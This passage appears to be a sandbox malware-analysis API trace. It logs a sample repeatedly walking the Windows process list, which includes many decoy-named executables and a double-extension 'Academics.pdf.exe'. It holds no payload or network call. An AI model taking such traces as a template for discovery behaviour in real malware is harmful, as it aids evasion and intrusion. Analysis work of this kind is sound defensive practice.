szExeFile="winlogon.exe")) returned 1 [0310.189] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.190] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0310.192] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.193] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.193] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.194] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.195] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.196] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0310.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.198] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0310.199] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0310.200] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0310.201] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0310.202] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.202] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0310.203] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0310.204] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0310.205] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0310.206] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0310.207] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0310.208] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0310.208] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0310.209] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0310.210] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0310.211] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0310.211] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0310.212] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0310.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0310.214] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0310.215] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0310.216] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0310.216] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0310.217] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.218] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.219] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0310.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.221] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0310.221] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.222] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0310.223] CloseHandle (hObject=0x294) returned 1 [0310.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.223] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.223] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0310.225] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.226] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.227] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.230] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0310.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.232] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.233] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0310.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.236] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.237] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.238] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.238] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0310.239] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.240] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.241] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0310.242] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0310.243] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0310.244] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0310.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0310.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0310.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0310.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0310.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0310.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0310.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0310.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0310.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0310.253] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0310.254] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0310.255] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0310.256] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0310.257] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0310.257] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0310.258] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0310.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0310.260] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0310.261] Process32NextW (in: 